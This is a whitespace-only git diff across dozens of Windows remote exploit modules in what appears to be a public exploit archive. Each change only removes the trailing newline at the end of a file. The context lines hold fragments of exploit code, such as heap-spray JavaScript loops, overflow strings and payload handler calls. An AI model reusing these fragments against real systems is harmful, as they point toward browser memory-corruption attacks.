Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16523.rb b/platforms/windows/remote/16523.rb index d2615cc23..97e181961 100755 --- a/platforms/windows/remote/16523.rb +++ b/platforms/windows/remote/16523.rb @@ -145,4 +145,4 @@ class Metasploit3 < Msf::Exploit::Remote ret end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16524.rb b/platforms/windows/remote/16524.rb index ecffc03b2..0dd10e96a 100755 --- a/platforms/windows/remote/16524.rb +++ b/platforms/windows/remote/16524.rb @@ -140,4 +140,4 @@ setTimeout('window.location = "#{get_resource}";', 500); # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16525.rb b/platforms/windows/remote/16525.rb index e42a37d04..296b028f5 100755 --- a/platforms/windows/remote/16525.rb +++ b/platforms/windows/remote/16525.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16526.rb b/platforms/windows/remote/16526.rb index 3eec990e8..67d791a2b 100755 --- a/platforms/windows/remote/16526.rb +++ b/platforms/windows/remote/16526.rb @@ -536,4 +536,4 @@ class Metasploit3 < Msf::Exploit::Remote return ani end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16527.rb b/platforms/windows/remote/16527.rb index d96b8bbc8..ee2544ad0 100755 --- a/platforms/windows/remote/16527.rb +++ b/platforms/windows/remote/16527.rb @@ -156,4 +156,4 @@ class Metasploit3 < Msf::Exploit::Remote content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n" end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16528.rb b/platforms/windows/remote/16528.rb index d6977167a..3a4ea9b3a 100755 --- a/platforms/windows/remote/16528.rb +++ b/platforms/windows/remote/16528.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16529.rb b/platforms/windows/remote/16529.rb index a29009031..a27d34aad 100755 --- a/platforms/windows/remote/16529.rb +++ b/platforms/windows/remote/16529.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16530.rb b/platforms/windows/remote/16530.rb index 4a6ffc2f7..a0fa24010 100755 --- a/platforms/windows/remote/16530.rb +++ b/platforms/windows/remote/16530.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16532.rb b/platforms/windows/remote/16532.rb index c56c2d064..1f896925a 100755 --- a/platforms/windows/remote/16532.rb +++ b/platforms/windows/remote/16532.rb @@ -141,4 +141,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16533.rb b/platforms/windows/remote/16533.rb index f1e29873a..eb777d8b1 100755 --- a/platforms/windows/remote/16533.rb +++ b/platforms/windows/remote/16533.rb @@ -438,4 +438,4 @@ EOS rvas['BaseAddress'] + rvas[key] end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16534.rb b/platforms/windows/remote/16534.rb index f3dcaaae8..8c55819dd 100755 --- a/platforms/windows/remote/16534.rb +++ b/platforms/windows/remote/16534.rb @@ -152,4 +152,4 @@ Invalid exception stack at 47306147 [Byakugan] Control of 0x47306147 at offset 4680. 0:000> !pattern_offset 5140 0x61473161 [Byakugan] Control of 0x61473161 at offset 4684. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16535.rb b/platforms/windows/remote/16535.rb index db506441d..7d0c4caad 100755 --- a/platforms/windows/remote/16535.rb +++ b/platforms/windows/remote/16535.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16536.rb b/platforms/windows/remote/16536.rb index a9cb58234..830991ae3 100755 --- a/platforms/windows/remote/16536.rb +++ b/platforms/windows/remote/16536.rb @@ -158,4 +158,4 @@ class Metasploit3 < Msf::Exploit::Remote # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16537.rb b/platforms/windows/remote/16537.rb index 862ed19dd..167620ae6 100755 --- a/platforms/windows/remote/16537.rb +++ b/platforms/windows/remote/16537.rb @@ -139,4 +139,4 @@ for(xj=0; xj<10; xj++){ handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16538.rb b/platforms/windows/remote/16538.rb index a37a0fd86..6bfe5ba12 100755 --- a/platforms/windows/remote/16538.rb +++ b/platforms/windows/remote/16538.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16539.rb b/platforms/windows/remote/16539.rb index 3a553098f..c8de69555 100755 --- a/platforms/windows/remote/16539.rb +++ b/platforms/windows/remote/16539.rb @@ -110,4 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16540.rb b/platforms/windows/remote/16540.rb index fc011350a..cd991d906 100755 --- a/platforms/windows/remote/16540.rb +++ b/platforms/windows/remote/16540.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16541.rb b/platforms/windows/remote/16541.rb index 883d36490..2b027fb5a 100755 --- a/platforms/windows/remote/16541.rb +++ b/platforms/windows/remote/16541.rb @@ -327,5 +327,4 @@ MsgBox "Welcome! Press F1 to dismiss this dialog.", ,"Welcome!", "#{unc}", 1 super end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16542.rb b/platforms/windows/remote/16542.rb index f34ae0f09..59fc9bce5 100755 --- a/platforms/windows/remote/16542.rb +++ b/platforms/windows/remote/16542.rb @@ -186,4 +186,4 @@ history.go(0); end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16543.rb b/platforms/windows/remote/16543.rb index 8b3527a54..2b22b21ac 100755 --- a/platforms/windows/remote/16543.rb +++ b/platforms/windows/remote/16543.rb @@ -141,4 +141,4 @@ class Metasploit3 < Msf::Exploit::Remote ret end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16544.rb b/platforms/windows/remote/16544.rb index 80ab4b5d7..94e5256f9 100755 --- a/platforms/windows/remote/16544.rb +++ b/platforms/windows/remote/16544.rb @@ -162,4 +162,4 @@ for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++) handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16545.rb b/platforms/windows/remote/16545.rb index 60d543bad..a8833644e 100755 --- a/platforms/windows/remote/16545.rb +++ b/platforms/windows/remote/16545.rb @@ -344,5 +344,4 @@ if (window.navigator.appName == "Microsoft Internet Explorer") { super end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16547.rb b/platforms/windows/remote/16547.rb index 2f330b235..c789a6ace 100755 --- a/platforms/windows/remote/16547.rb +++ b/platforms/windows/remote/16547.rb @@ -130,5 +130,4 @@ for (#{var_i}=0;#{var_i}<1285;#{var_i}++) #{var_memory}[#{var_i}]=#{var_bk}+#{va # Handle the payload handler(cli) end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16548.rb b/platforms/windows/remote/16548.rb index cf015b9ce..f7228785c 100755 --- a/platforms/windows/remote/16548.rb +++ b/platforms/windows/remote/16548.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16549.rb b/platforms/windows/remote/16549.rb index f974ca887..11e7974ac 100755 --- a/platforms/windows/remote/16549.rb +++ b/platforms/windows/remote/16549.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16550.rb b/platforms/windows/remote/16550.rb index 524632a55..28385b9e8 100755 --- a/platforms/windows/remote/16550.rb +++ b/platforms/windows/remote/16550.rb @@ -377,5 +377,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16551.rb b/platforms/windows/remote/16551.rb index 24f852127..0412a7734 100755 --- a/platforms/windows/remote/16551.rb +++ b/platforms/windows/remote/16551.rb @@ -216,4 +216,4 @@ EOS end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16552.rb b/platforms/windows/remote/16552.rb index 5a0fece13..4fda0a3a6 100755 --- a/platforms/windows/remote/16552.rb +++ b/platforms/windows/remote/16552.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16553.rb b/platforms/windows/remote/16553.rb index 7bed215fc..8e677769e 100755 --- a/platforms/windows/remote/16553.rb +++ b/platforms/windows/remote/16553.rb @@ -128,4 +128,4 @@ vulnerable.OnBeforeVideoDownload(evil_string); handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16554.rb b/platforms/windows/remote/16554.rb index 29c180747..05abb09b5 100755 --- a/platforms/windows/remote/16554.rb +++ b/platforms/windows/remote/16554.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16555.rb b/platforms/windows/remote/16555.rb index ef4026431..79753a198 100755 --- a/platforms/windows/remote/16555.rb +++ b/platforms/windows/remote/16555.rb @@ -155,4 +155,4 @@ window.setTimeout("#{rand10}();",800); # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16557.rb b/platforms/windows/remote/16557.rb index 35e7dc9fe..c39dd41fa 100755 --- a/platforms/windows/remote/16557.rb +++ b/platforms/windows/remote/16557.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16558.rb b/platforms/windows/remote/16558.rb index 017ac7b7a..b72117be1 100755 --- a/platforms/windows/remote/16558.rb +++ b/platforms/windows/remote/16558.rb @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16559.rb b/platforms/windows/remote/16559.rb index cdc635480..00167e62a 100755 --- a/platforms/windows/remote/16559.rb +++ b/platforms/windows/remote/16559.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16560.rb b/platforms/windows/remote/16560.rb index deedeed3b..b1ea2095a 100755 --- a/platforms/windows/remote/16560.rb +++ b/platforms/windows/remote/16560.rb @@ -141,4 +141,4 @@ function #{j_function}() { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16561.rb b/platforms/windows/remote/16561.rb index 03a4c6874..0e6ca9a04 100755 --- a/platforms/windows/remote/16561.rb +++ b/platforms/windows/remote/16561.rb @@ -269,4 +269,4 @@ function #{var_func_exploit}( ) { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16563.rb b/platforms/windows/remote/16563.rb index 9ee9416e9..1aa4abc10 100755 --- a/platforms/windows/remote/16563.rb +++ b/platforms/windows/remote/16563.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16564.rb b/platforms/windows/remote/16564.rb index f2833d713..589a066f2 100755 --- a/platforms/windows/remote/16564.rb +++ b/platforms/windows/remote/16564.rb @@ -128,4 +128,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16565.rb b/platforms/windows/remote/16565.rb index 9cbf97f8c..859e8a90e 100755 --- a/platforms/windows/remote/16565.rb +++ b/platforms/windows/remote/16565.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16566.rb b/platforms/windows/remote/16566.rb index 4f1995732..28e254b52 100755 --- a/platforms/windows/remote/16566.rb +++ b/platforms/windows/remote/16566.rb @@ -98,4 +98,4 @@ var #{strname} = new String('#{sploit}'); handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16567.rb b/platforms/windows/remote/16567.rb index b47967815..d31f75a5d 100755 --- a/platforms/windows/remote/16567.rb +++ b/platforms/windows/remote/16567.rb @@ -120,4 +120,4 @@ for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_s end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16568.rb b/platforms/windows/remote/16568.rb index a4c775108..edcf24a87 100755 --- a/platforms/windows/remote/16568.rb +++ b/platforms/windows/remote/16568.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16569.rb b/platforms/windows/remote/16569.rb index 0ce352b08..e862188e4 100755 --- a/platforms/windows/remote/16569.rb +++ b/platforms/windows/remote/16569.rb @@ -96,4 +96,4 @@ var #{strname} = new String('#{sploit}'); handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16570.rb b/platforms/windows/remote/16570.rb index 0995821c0..82d3831e4 100755 --- a/platforms/windows/remote/16570.rb +++ b/platforms/windows/remote/16570.rb @@ -87,4 +87,4 @@ codebase='http://www.awingsoft.com/zips/WindsPly.CAB'> send_response(cli, html, { 'Content-Type' => 'text/html' }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16571.rb b/platforms/windows/remote/16571.rb index d66470cc2..2e807fa0a 100755 --- a/platforms/windows/remote/16571.rb +++ b/platforms/windows/remote/16571.rb @@ -120,4 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16572.rb b/platforms/windows/remote/16572.rb index b79ad439b..18714a490 100755 --- a/platforms/windows/remote/16572.rb +++ b/platforms/windows/remote/16572.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16573.rb b/platforms/windows/remote/16573.rb index e43d5008d..f81b36463 100755 --- a/platforms/windows/remote/16573.rb +++ b/platforms/windows/remote/16573.rb @@ -102,4 +102,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16574.rb b/platforms/windows/remote/16574.rb index 23ad1ea1c..2e43d7da0 100755 --- a/platforms/windows/remote/16574.rb +++ b/platforms/windows/remote/16574.rb @@ -452,5 +452,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16575.rb b/platforms/windows/remote/16575.rb index 829e70edf..10ccf1088 100755 --- a/platforms/windows/remote/16575.rb +++ b/platforms/windows/remote/16575.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16576.rb b/platforms/windows/remote/16576.rb index fa6edd576..0bf616ce4 100755 --- a/platforms/windows/remote/16576.rb +++ b/platforms/windows/remote/16576.rb @@ -107,4 +107,4 @@ function check() handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16577.rb b/platforms/windows/remote/16577.rb index 6f2175d9a..a352bc665 100755 --- a/platforms/windows/remote/16577.rb +++ b/platforms/windows/remote/16577.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16578.rb b/platforms/windows/remote/16578.rb index acc2f10bc..783c87d70 100755 --- a/platforms/windows/remote/16578.rb +++ b/platforms/windows/remote/16578.rb @@ -149,4 +149,4 @@ function #{var_start}() { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16579.rb b/platforms/windows/remote/16579.rb index 649510115..750d00d57 100755 --- a/platforms/windows/remote/16579.rb +++ b/platforms/windows/remote/16579.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16580.rb b/platforms/windows/remote/16580.rb index 9c7495bbb..437473ac5 100755 --- a/platforms/windows/remote/16580.rb +++ b/platforms/windows/remote/16580.rb @@ -120,4 +120,4 @@ while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16581.rb b/platforms/windows/remote/16581.rb index 0d7ebd54d..edc151e88 100755 --- a/platforms/windows/remote/16581.rb +++ b/platforms/windows/remote/16581.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16582.rb b/platforms/windows/remote/16582.rb index 86fd3a574..eca0811e9 100755 --- a/platforms/windows/remote/16582.rb +++ b/platforms/windows/remote/16582.rb @@ -127,4 +127,4 @@ try { handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16583.rb b/platforms/windows/remote/16583.rb index 18e07491e..bb4237204 100755 --- a/platforms/windows/remote/16583.rb +++ b/platforms/windows/remote/16583.rb @@ -306,5 +306,4 @@ class Metasploit3 < Msf::Exploit::Remote # Handle the payload handler(cli) end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16584.rb b/platforms/windows/remote/16584.rb index 4a4aacaae..ba61a6c1a 100755 --- a/platforms/windows/remote/16584.rb +++ b/platforms/windows/remote/16584.rb @@ -121,4 +121,4 @@ while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16585.rb b/platforms/windows/remote/16585.rb index 0cba887f6..bd6a13202 100755 --- a/platforms/windows/remote/16585.rb +++ b/platforms/windows/remote/16585.rb @@ -380,4 +380,4 @@ document.location = "#{js_uri}"; super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16586.rb b/platforms/windows/remote/16586.rb index 931bc231c..99d728704 100755 --- a/platforms/windows/remote/16586.rb +++ b/platforms/windows/remote/16586.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16587.rb b/platforms/windows/remote/16587.rb index f63c24e90..2a39e795e 100755 --- a/platforms/windows/remote/16587.rb +++ b/platforms/windows/remote/16587.rb @@ -252,4 +252,4 @@ EOS }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16588.rb b/platforms/windows/remote/16588.rb index 16f0df82d..165adced6 100755 --- a/platforms/windows/remote/16588.rb +++ b/platforms/windows/remote/16588.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16590.rb b/platforms/windows/remote/16590.rb index acfb24404..cc84ea29d 100755 --- a/platforms/windows/remote/16590.rb +++ b/platforms/windows/remote/16590.rb @@ -260,5 +260,4 @@ document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank"; end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16591.rb b/platforms/windows/remote/16591.rb index f73f98913..c6b315c34 100755 --- a/platforms/windows/remote/16591.rb +++ b/platforms/windows/remote/16591.rb @@ -130,4 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16592.rb b/platforms/windows/remote/16592.rb index 279f846bb..871b5f10b 100755 --- a/platforms/windows/remote/16592.rb +++ b/platforms/windows/remote/16592.rb @@ -121,4 +121,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16594.rb b/platforms/windows/remote/16594.rb index dd383a7ec..237af3424 100755 --- a/platforms/windows/remote/16594.rb +++ b/platforms/windows/remote/16594.rb @@ -134,4 +134,4 @@ type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedi end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16595.rb b/platforms/windows/remote/16595.rb index 5d0e5d26e..772f2af99 100755 --- a/platforms/windows/remote/16595.rb +++ b/platforms/windows/remote/16595.rb @@ -119,4 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16597.rb b/platforms/windows/remote/16597.rb index 56b1e33aa..206fa69e1 100755 --- a/platforms/windows/remote/16597.rb +++ b/platforms/windows/remote/16597.rb @@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16598.rb b/platforms/windows/remote/16598.rb index efbd9bbd8..737a619d2 100755 --- a/platforms/windows/remote/16598.rb +++ b/platforms/windows/remote/16598.rb @@ -138,4 +138,4 @@ function #{func}() handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16599.rb b/platforms/windows/remote/16599.rb index 04c6a6171..0188a4686 100755 --- a/platforms/windows/remote/16599.rb +++ b/platforms/windows/remote/16599.rb @@ -170,4 +170,4 @@ var t = #{var_event}.srcElement; # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/166.pl b/platforms/windows/remote/166.pl index 348380e8d..b5361ee70 100755 --- a/platforms/windows/remote/166.pl +++ b/platforms/windows/remote/166.pl @@ -111,4 +111,4 @@ sub sendraw { return @in; } else { die("[-] Can't connect...\n"); }} -# milw0rm.com [2004-03-26] +# milw0rm.com [2004-03-26] \ No newline at end of file diff --git a/platforms/windows/remote/16600.rb b/platforms/windows/remote/16600.rb index e22fb4f35..9974d7872 100755 --- a/platforms/windows/remote/16600.rb +++ b/platforms/windows/remote/16600.rb @@ -115,4 +115,4 @@ void DownloadAndInstall( [in] BSTR InstCmdLine, [in] BSTR UpgdCmdLine, [in] BSTR ProdCode); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16601.rb b/platforms/windows/remote/16601.rb index ceea7c942..2a5ca6069 100755 --- a/platforms/windows/remote/16601.rb +++ b/platforms/windows/remote/16601.rb @@ -110,5 +110,4 @@ for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape handler(cli) end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16602.rb b/platforms/windows/remote/16602.rb index ed9c71f28..976b1a11d 100755 --- a/platforms/windows/remote/16602.rb +++ b/platforms/windows/remote/16602.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16603.rb b/platforms/windows/remote/16603.rb index 080960dd5..cfe0d40c4 100755 --- a/platforms/windows/remote/16603.rb +++ b/platforms/windows/remote/16603.rb @@ -119,4 +119,4 @@ var #{strname} = new String('#{sploit}'); handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16604.rb b/platforms/windows/remote/16604.rb index f7160ba03..dc68c556c 100755 --- a/platforms/windows/remote/16604.rb +++ b/platforms/windows/remote/16604.rb @@ -153,4 +153,4 @@ Please wait... end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16605.rb b/platforms/windows/remote/16605.rb index d776a428e..732ce0bfb 100755 --- a/platforms/windows/remote/16605.rb +++ b/platforms/windows/remote/16605.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16607.rb b/platforms/windows/remote/16607.rb index aefe98096..5bd7effa7 100755 --- a/platforms/windows/remote/16607.rb +++ b/platforms/windows/remote/16607.rb @@ -123,4 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16608.rb b/platforms/windows/remote/16608.rb index 1c70f22ae..a212ffb03 100755 --- a/platforms/windows/remote/16608.rb +++ b/platforms/windows/remote/16608.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16609.rb b/platforms/windows/remote/16609.rb index 486f10f53..63f47a7f3 100755 --- a/platforms/windows/remote/16609.rb +++ b/platforms/windows/remote/16609.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16610.rb b/platforms/windows/remote/16610.rb index 02a52b802..cc48e5192 100755 --- a/platforms/windows/remote/16610.rb +++ b/platforms/windows/remote/16610.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16611.rb b/platforms/windows/remote/16611.rb index 7f8a4fafc..4ec7c2a81 100755 --- a/platforms/windows/remote/16611.rb +++ b/platforms/windows/remote/16611.rb @@ -154,4 +154,4 @@ itunes_album_id> a>.Z.......\./!. !.UP.......B...& Z....D)ydB.,.vy/ -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16612.rb b/platforms/windows/remote/16612.rb index 6dc0bd7ca..7ffd69782 100755 --- a/platforms/windows/remote/16612.rb +++ b/platforms/windows/remote/16612.rb @@ -193,4 +193,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16613.rb b/platforms/windows/remote/16613.rb index 9f905e63f..622d61c7a 100755 --- a/platforms/windows/remote/16613.rb +++ b/platforms/windows/remote/16613.rb @@ -108,4 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16616.rb b/platforms/windows/remote/16616.rb index 42432270b..430a06e28 100755 --- a/platforms/windows/remote/16616.rb +++ b/platforms/windows/remote/16616.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16630.rb b/platforms/windows/remote/16630.rb index ddd799f89..fa8de5804 100755 --- a/platforms/windows/remote/16630.rb +++ b/platforms/windows/remote/16630.rb @@ -105,4 +105,4 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap file_create(content) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16635.rb b/platforms/windows/remote/16635.rb index 30656b03a..ac8081386 100755 --- a/platforms/windows/remote/16635.rb +++ b/platforms/windows/remote/16635.rb @@ -124,4 +124,4 @@ void CleanUp(BSTR ServerIPAddress, long ServerPort); BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands); ...and probably more. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16638.rb b/platforms/windows/remote/16638.rb index 2c5f04fd9..8c3175815 100755 --- a/platforms/windows/remote/16638.rb +++ b/platforms/windows/remote/16638.rb @@ -108,4 +108,4 @@ for (#{var_i} = 0; #{var_i} < 2024; #{var_i}++) { #{rand8} = #{rand8} + unescape file_create(content) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16639.rb b/platforms/windows/remote/16639.rb index 99b88e8bd..4646d72df 100755 --- a/platforms/windows/remote/16639.rb +++ b/platforms/windows/remote/16639.rb @@ -142,4 +142,4 @@ void CreateReportOfAssetDifferences( BSTR pszAsset, short append); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/1664.py b/platforms/windows/remote/1664.py index 8ae997e06..09570d477 100755 --- a/platforms/windows/remote/1664.py +++ b/platforms/windows/remote/1664.py @@ -54,4 +54,4 @@ while(1): conn.send(egg) conn.close() -# milw0rm.com [2006-04-11] +# milw0rm.com [2006-04-11] \ No newline at end of file diff --git a/platforms/windows/remote/16641.rb b/platforms/windows/remote/16641.rb index 4520de25a..515ffa241 100755 --- a/platforms/windows/remote/16641.rb +++ b/platforms/windows/remote/16641.rb @@ -106,4 +106,4 @@ for (#{var_i} = 0; #{var_i} < 8293; #{var_i}++) { #{rand8} = #{rand8} + unescape end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16647.rb b/platforms/windows/remote/16647.rb index 64cd65cf3..46aa79015 100755 --- a/platforms/windows/remote/16647.rb +++ b/platforms/windows/remote/16647.rb @@ -108,4 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote file_create(html) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16649.rb b/platforms/windows/remote/16649.rb index 466f006e1..53c93dfe8 100755 --- a/platforms/windows/remote/16649.rb +++ b/platforms/windows/remote/16649.rb @@ -103,4 +103,4 @@ for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + file_create(content) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16690.rb b/platforms/windows/remote/16690.rb index 536727272..40f9ac568 100755 --- a/platforms/windows/remote/16690.rb +++ b/platforms/windows/remote/16690.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16691.rb b/platforms/windows/remote/16691.rb index b35406bce..c92cc782f 100755 --- a/platforms/windows/remote/16691.rb +++ b/platforms/windows/remote/16691.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16692.rb b/platforms/windows/remote/16692.rb index aae4f2343..cd22b2e35 100755 --- a/platforms/windows/remote/16692.rb +++ b/platforms/windows/remote/16692.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git 